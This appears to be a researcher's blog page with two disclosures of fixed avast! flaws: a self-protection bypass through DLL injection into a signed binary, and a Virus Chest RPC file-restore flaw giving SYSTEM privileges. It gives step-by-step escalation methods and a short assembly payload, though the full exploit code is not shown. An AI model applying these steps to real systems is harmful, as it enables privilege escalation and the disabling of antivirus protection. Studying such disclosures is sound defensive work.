The avast! self-protection allows the program to protect itself from malicious programs. It is implemented in the kernel module aswSP.sys and relies on a notion of trust level for the processes running on the system. aswSP.sys exposes a variety of devices and associated IOCTLs, but most of them require administrative privileges, or must be called from a trusted process. However, some of them are accessible to unprivileged users, notably through \\.\aswSP_Open.

For example, to find out whether the self-protection is enabled, one can query the IOCTL 0xb2d60190, and to find out whether a process is trusted, 0xb2d600cc. The trusted processes running by default are System, AvastSvc.exe, AvastUI.exe and, on the versions that include the firewall, afwServ.exe. This is illustrated by the following Python script:


A trusted process can modify the trust level of another process. One IOCTL (0xb2d60198) allows a process to become trusted, but the way it works is somewhat convoluted. This IOCTL takes as input a 0x19-byte buffer that contains, among other things, two user-mode (Ring 3) function pointers. The IOCTL code determines which module these two pointers are located in, and verifies its signature. This is not a regular Windows binary signature, but an avast!-specific one. If the binary is not signed, or if the signature is invalid, the call fails. If everything checks out, however, the kernel driver queues a user-mode APC that executes one of the function pointers. Depending on what that routine does (modifying the parameters it is passed), the driver ends up calling a function that raises the trust level of the process whose PID was passed in the input buffer.

.text:0001981C kk_SetProcessTrustCallback proc near    ; DATA XREF: kk_aswSP_Open_DispatchIoControl+2B7 o
.text:0001981C
.text:0001981C arg_0           = dword ptr  8
.text:0001981C
.text:0001981C                 mov     edi, edi
.text:0001981E                 push    ebp
.text:0001981F                 mov     ebp, esp
.text:00019821                 mov     eax, [ebp+arg_0]
.text:00019824                 movzx   ecx, byte ptr [eax+8]
.text:00019828                 push    ecx             ; char
.text:00019829                 push    dword ptr [eax+4] ; PVOID
.text:0001982C                 call    kk_SetProcessTrust0Or2
.text:00019831                 pop     ebp
.text:00019832                 retn    4
.text:00019832 kk_SetProcessTrustCallback endp

To prevent some possible abuse, the driver checks that the process calling the IOCTL is not being debugged:

.text:00019496                 push    ebx             ; ReturnLength
.text:00019497                 push    4               ; ProcessInformationLength
.text:00019499                 lea     eax, [ebp+var_3C]
.text:0001949C                 push    eax             ; ProcessInformation
.text:0001949D                 push    ProcessDebugPort ; ProcessInformationClass
.text:0001949F                 push    0FFFFFFFFh      ; ProcessHandle
.text:000194A1                 call    ds:NtQueryInformationProcess

One scenario that the avast! developers apparently did not take into account is the possibility of launching a signed avast! binary in suspended mode, and then injecting a task into it. Of course, this requires that the function pointers we supply in the IOCTL input buffer be located within the binary in question, and that these pointers be interesting enough for us to end up executing code under our control. For example, we can use a trampoline that reads a function pointer from the .data section of the binary and calls it:

.text:005E0BCD                 mov     eax, dword_7114F8
.text:005E0BD2                 test    eax, eax
.text:005E0BD4                 jz      short loc_5E0BE4
.text:005E0BD6                 lea     ecx, [ebp+var_30]
.text:005E0BD9                 push    ecx
.text:005E0BDA                 push    3
.text:005E0BDC                 call    eax ; dword_7114F8

This gadget is found in AvastUI.exe, a binary signed by avast!

To turn our code into trusted code, we just need to follow these steps:

  • create AvastUI.exe (or another signed binary containing a suitable gadget) in suspended mode
  • inject a thread (I actually wrote a DLL for that) which will:
    • find the gadget in the binary (here 005E0BCD)
    • write the function pointer we want to execute (here at dword_7114F8)
    • call IOCTL 0xb2d60198 with a correctly built input buffer

This way the driver's checks succeed, and our function gets executed through a user-mode APC. Now, for the driver to change the trust level of the process, this function has to modify a parameter as follows:

__declspec( naked ) DWORD UserModeAPCFunction( )
{
    __asm
    {
        //int 3
        mov eax, dword ptr [esp + 10h]
        test eax,eax
        jz skip
        mov dword ptr [eax], 41414141h
skip:
        xor eax,eax
        add esp, 0Ch
        ret
    }
}

From here on, our code is trusted, and we can do whatever we want with the antivirus (EoP, disabling it, etc.).


Here is the code of the DLL to inject:

Thursday, July 30, 2015

avast! Virus Chest RPC EoP (and potential RCE in some versions)

Another issue fixed in avast! a little over a year ago. And once again, a vulnerability that does not require memory corruption. As the saying goes, memory corruptions are for later.

Summary

Vulnerability type: logic issue
Vector: LPC (or RPC) call to c6c94c23-538f-4ac5-b34a-00e76ae7c67a v1.0
Impact: EoP to SYSTEM, or potential RCE in the enterprise versions of avast!
Verified on: avast! Free ashServ.dll v9.something

Description

The avast! Virus Chest is controlled through an RPC interface implemented in ashServ.dll, the interface being c6c94c23-538f-4ac5-b34a-00e76ae7c67a v1.0. By default, this interface only listens on a local endpoint (ncalrpc), but in some configurations of the product, notably the enterprise versions, it can also listen on a TCP port (ncacn_ip_tcp). Neither of these two endpoints required authentication, but some functions required a password, passed as a character string in the RPC data (checked via MD5). On a local connection (or if the Chest configuration option "CheckPassword" is disabled), the password was not checked.

.text:6512BC91                 call    ds:RpcStringBindingParseW
.text:6512BC97                 test    eax, eax
.text:6512BC99                 jnz     loc_6512BD24
.text:6512BC9F                 push    offset aNcalrpc ; "ncalrpc"
.text:6512BCA4                 push    [ebp+Protseq]   ; wchar_t *
.text:6512BCA7                 call    ds:_wcsicmp
.text:6512BCAD                 add     esp, 8
.text:6512BCB0                 test    eax, eax
.text:6512BCB2                 jz      short AUTH_SUCCESS
.text:6512BCB4                 push    1
.text:6512BCB6                 push    offset aCheckpassword ; "CheckPassword"
.text:6512BCBB                 push    offset aChest   ; "Chest"
.text:6512BCC0                 call    ds:aswGetAvastPropertyInt
.text:6512BCC6                 add     esp, 0Ch
.text:6512BCC9                 test    eax, eax
.text:6512BCCB                 jz      short AUTH_SUCCESS
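
The decision made by this snippet can be paraphrased as below. This is a sketch of my reading of the disassembly, not the vendor's code: password_check_required is a made-up name, and treating the third argument of aswGetAvastPropertyInt (the pushed 1) as the default value of the setting is an assumption.

```python
def password_check_required(protseq: str, check_password_setting: int = 1) -> bool:
    """Return True when the RPC handler would go on to verify the password.

    protseq: protocol sequence parsed from the client binding string.
    check_password_setting: value of the Chest "CheckPassword" property
    (assumed to default to 1 when the property is not set).
    """
    # _wcsicmp is case-insensitive, so compare in lower case.
    if protseq.lower() == "ncalrpc":
        return False  # local callers jump straight to AUTH_SUCCESS
    if check_password_setting == 0:
        return False  # check disabled in the configuration
    return True       # remote caller, check enabled


for seq, setting in [("ncalrpc", 1), ("ncacn_ip_tcp", 1), ("ncacn_ip_tcp", 0)]:
    print(seq, setting, password_check_required(seq, setting))
```

In other words, any local caller is authenticated no matter what password it sends.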

The problem lies in the RestoreFile function exposed by the RPC interface. When called for a given file identifier, the restore function uses the OrigFolder and OrigFileName properties associated with that file and blindly restores the file to the specified location as SYSTEM, regardless of the caller's privilege level.

.text:6512BA84                 push    104h
.text:6512BA89                 lea     eax, [ebp+var_834]
.text:6512BA8F                 push    eax
.text:6512BA90                 push    offset aOrigfolder ; "OrigFolder"
.text:6512BA95                 mov     ecx, esi
.text:6512BA97                 call    edi ; IaswObject::GetValue(wchar_t const *,wchar_t *,ulong,wchar_t const *)
.text:6512BA99                 push    offset word_65136530
.text:6512BA9E                 push    104h
.text:6512BAA3                 lea     eax, [ebp+var_424]
.text:6512BAA9                 push    eax
.text:6512BAAA                 push    offset aOrigfilename ; "OrigFileName"
.text:6512BAAF                 mov     ecx, esi
.text:6512BAB1                 call    edi ; IaswObject::GetValue(wchar_t const *,wchar_t *,ulong,wchar_t const *)
.text:6512BAB3                 lea     eax, [ebp+var_424]
.text:6512BAB9                 push    eax
.text:6512BABA                 lea     eax, [ebp+var_834]
.text:6512BAC0                 push    eax
.text:6512BAC1                 push    offset aSS_0    ; "%s\\%s"
.text:6512BAC6                 lea     eax, [ebp+var_21C]
.text:6512BACC                 push    104h            ; size_t
.text:6512BAD1                 push    eax             ; wchar_t *
.text:6512BAD2                 call    ds:_snwprintf
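
Put differently, the restore destination is just the two stored properties glued together with a backslash. A minimal sketch of that step, assuming the 0x104 passed to _snwprintf simply caps the result at 260 characters; restore_target is an illustrative name and the sample values are made up:

```python
MAX_PATH_CHARS = 0x104  # 260, the count passed to _snwprintf in the listing


def restore_target(orig_folder: str, orig_file_name: str) -> str:
    """Build the restore destination the same way as the "%s\\%s" format."""
    path = "%s\\%s" % (orig_folder, orig_file_name)
    # Approximation: output beyond the buffer size is cut off.
    return path[:MAX_PATH_CHARS]


# Both values come from the Chest entry, so whoever added the entry
# controls where the file lands.
print(restore_target("C:\\Windows\\System32", "example.dll"))
```

Nothing in this path construction checks that the destination is somewhere the caller would be allowed to write.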

To elevate privileges, a local (or remote) user can call the Chest's AddFile RPC function, setting the OrigFolder and OrigFileName properties to those of a file they want to overwrite (or create), and then call RestoreFile. This way, they can overwrite any SYSTEM binary, or create a MOF file à la Stuxnet to execute code as SYSTEM.

For avast! Free this is only an EoP, but for avast! Endpoint Protection, if the Chest RPC is configured to listen on a TCP port (16108 by default), this could turn into an RCE, the catch being that RestoreFile checked the password.

Note that the AddFile function lets you specify the file's contents, modulo an XOR-style "encryption" with a huge key. The following code uses impacket to perform the RPC request (I had to remove the key because otherwise pastebin freaks out):